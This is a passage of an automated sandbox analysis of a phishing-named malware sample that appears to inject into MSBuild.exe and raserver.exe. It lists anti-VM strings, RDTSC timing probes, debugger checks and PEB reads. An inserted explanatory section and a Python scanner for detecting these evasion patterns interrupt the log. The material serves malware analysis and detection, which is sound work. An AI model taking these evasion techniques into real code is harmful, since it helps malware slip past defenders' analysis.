          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0041AC62 push D8D19732h; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00414D57 push esi; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0041AD65 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00414DEA push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0041ADB2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0041ADBB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00414E7E push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0041AE1C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00414E24 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0040FF92 push 00000033h; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0153D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0482D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00675913 push edx; retf
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0067AC62 push D8D19732h; iretd
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0067AD65 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00674D57 push esi; retf
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00674DEA push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0067ADB2 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0067ADBB push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00674E7E push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_00674E24 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0067AE1C push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 6_2_0066FF92 push 00000033h; iretd
          Source: initial sample | Static PE information: section name: .text entropy: 7.30520133301
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Process information set: NOOPENFILEERRORBOX (reported 32 times)
          Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara match | File source: 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Purchase Order 40,7045$.exe PID: 6708, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | RDTSC instruction interceptor: First address: 00000000004083D4, second address: 00000000004083DA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | RDTSC instruction interceptor: First address: 000000000040876E, second address: 0000000000408774, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 00000000006683D4, second address: 00000000006683DA, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 000000000066876E, second address: 0000000000668774, instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_004086A0 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Thread delayed: delay time: 922337203685477 (reported twice)
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe TID: 6740 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe TID: 6712 | Thread sleep time: -41500s >= -30000s
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe TID: 6728 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6596 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6136 | Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe | Last function: Thread delayed (reported twice)
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp | Binary or memory string: VMware
          Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.274511209.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp | Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.265134044.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000003.00000002.522311765.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.274567797.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000003.00000002.531888786.00000000053D7000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.274567797.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp | Binary or memory string: VMware
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp | Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exe | Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_004086A0 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_00409900 LdrLoadDll,
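The evasion evidence above mixes three things a scanner can pick up directly from a memory dump: a pair of rdtsc instructions a few bytes apart (the interceptor shows rdtsc; xor ecx, ecx; add ecx, eax; rdtsc at two addresses in each of MSBuild.exe and raserver.exe), reads of the PEB through fs:[30h], and sandbox or hypervisor strings. Two caveats before trusting any of it. First, the VMware device names and Hyper-V error messages attributed to explorer.exe are the analysis host's own strings, not checks made by the sample; only the strings in the sample's own memory (SBIEDLL.DLL, WINE_GET_UNIX_FILE_NAME, VMware SVGA II, the VMware Tools install path and the SOFTWARE\VMware, Inc. and HARDWARE\DEVICEMAP\Scsi registry paths) are evidence of a check. Second, the fs:[30h] reads at 0x014Exxxx to 0x015Bxxxx appear to fall inside the region where the report found a second ntdll image in MSBuild.exe (wntdll.pdb at 0x014C0000), so many of them are likely ntdll's own PEB accesses rather than payload code. The scanner below is an added example and not part of the report; the byte buffer is constructed, and the delay classification relies on the fact that .NET's TimeSpan.MaxValue (Int64.MaxValue ticks / 10000) is 922337203685477 ms, exactly the figure the report prints.

```python
import re

RDTSC = b"\x0f\x31"
PEB_READS = {
    b"\x64\xa1\x30\x00\x00\x00": "mov eax, fs:[30h]",        # the form listed at 1_2_0150B944 and others
    b"\x64\x8b\x0d\x30\x00\x00\x00": "mov ecx, fs:[30h]",
}
# Indicators the report finds in the sample's own memory (not the explorer.exe host strings).
SANDBOX_STRINGS = [
    b"SBIEDLL.DLL",                # Sandboxie
    b"WINE_GET_UNIX_FILE_NAME",    # Wine export
    b"VMware SVGA II",             # VMware display adapter
    b"VMware Tools",               # install path and registry key
    b"SOFTWARE\\VMware, Inc.",
]
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000   # .NET TimeSpan.MaxValue in ms == 922337203685477


def find_all(buf, pattern):
    return [m.start() for m in re.finditer(re.escape(pattern), buf)]


def rdtsc_pairs(buf, window=16):
    """Two RDTSCs within `window` bytes: a 'how many cycles did these instructions take'
    probe, which reads implausibly large under a hypervisor or an instrumenting sandbox."""
    offs = find_all(buf, RDTSC)
    return [(a, b) for a, b in zip(offs, offs[1:]) if b - a <= window]


def peb_reads(buf):
    """Offsets of direct PEB loads (BeingDebugged, NtGlobalFlag and the loader lists live there)."""
    hits = []
    for pattern, text in PEB_READS.items():
        hits += [(off, text) for off in find_all(buf, pattern)]
    return sorted(hits)


def sandbox_strings(buf):
    low = buf.lower()
    return [s.decode() for s in SANDBOX_STRINGS if s.lower() in low]


def classify_delay_ms(ms):
    """The report's -922337203685477s entries equal TimeSpan.MaxValue: an indefinite wait,
    not a tuned sandbox timeout. The 41500 ms and 52000 ms entries are the ones a
    sleep-skipping sandbox actually has to handle."""
    if ms >= TIMESPAN_MAX_MS:
        return "indefinite"
    return "long" if ms >= 30_000 else "short"


def scan(buf):
    return {"rdtsc_pairs": rdtsc_pairs(buf), "peb_reads": peb_reads(buf), "strings": sandbox_strings(buf)}


# Constructed buffer: a timing probe and a BeingDebugged read, then two indicator strings.
SAMPLE = (
    b"\x55\x8b\xec"                        # push ebp; mov ebp, esp
    + b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"  # rdtsc; xor ecx, ecx; add ecx, eax; rdtsc (as in the report)
    + b"\x64\xa1\x30\x00\x00\x00"          # mov eax, fs:[30h]
    + b"\x8a\x40\x02"                      # mov al, [eax+2]   (PEB.BeingDebugged)
    + b"\x00" * 32
    + b"sbiedll.dll\x00"
    + b"C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\\x00"
)

if __name__ == "__main__":
    print(scan(SAMPLE))
    print(classify_delay_ms(922337203685477), classify_delay_ms(41500))
```

Run it over the sample's own dumps (the 00000000.00000002.* regions for the loader, 1.2.MSBuild.exe.400000.* for the unpacked payload) rather than over explorer.exe memory, or the host's device names will show up as hits. A single rdtsc can also occur inside data or an immediate, which is why only pairs within a short window are reported.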
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0150B944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014EB171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014E9100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0151513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01504120 mov eax, dword ptr fs:[00000030h] (4 occurrences) and mov ecx, dword ptr fs:[00000030h] (1 occurrence)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014EB1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01512990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0150C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0151A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015651BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h] (8 occurrences) and mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015161A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015A49A4 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01500050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01567016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B4015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0150A830 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014FB02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0151002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0157B8D0 mov eax, dword ptr fs:[00000030h] (5 occurrences) and mov ecx, dword ptr fs:[00000030h] (1 occurrence)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014E40E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0150B8E4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01563884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0151F0BF mov ecx, dword ptr fs:[00000030h] (1 occurrence) and mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015120A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_01513B7A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_014EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_015A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h] (15 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015923E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01574257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01503A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01524A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01524A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
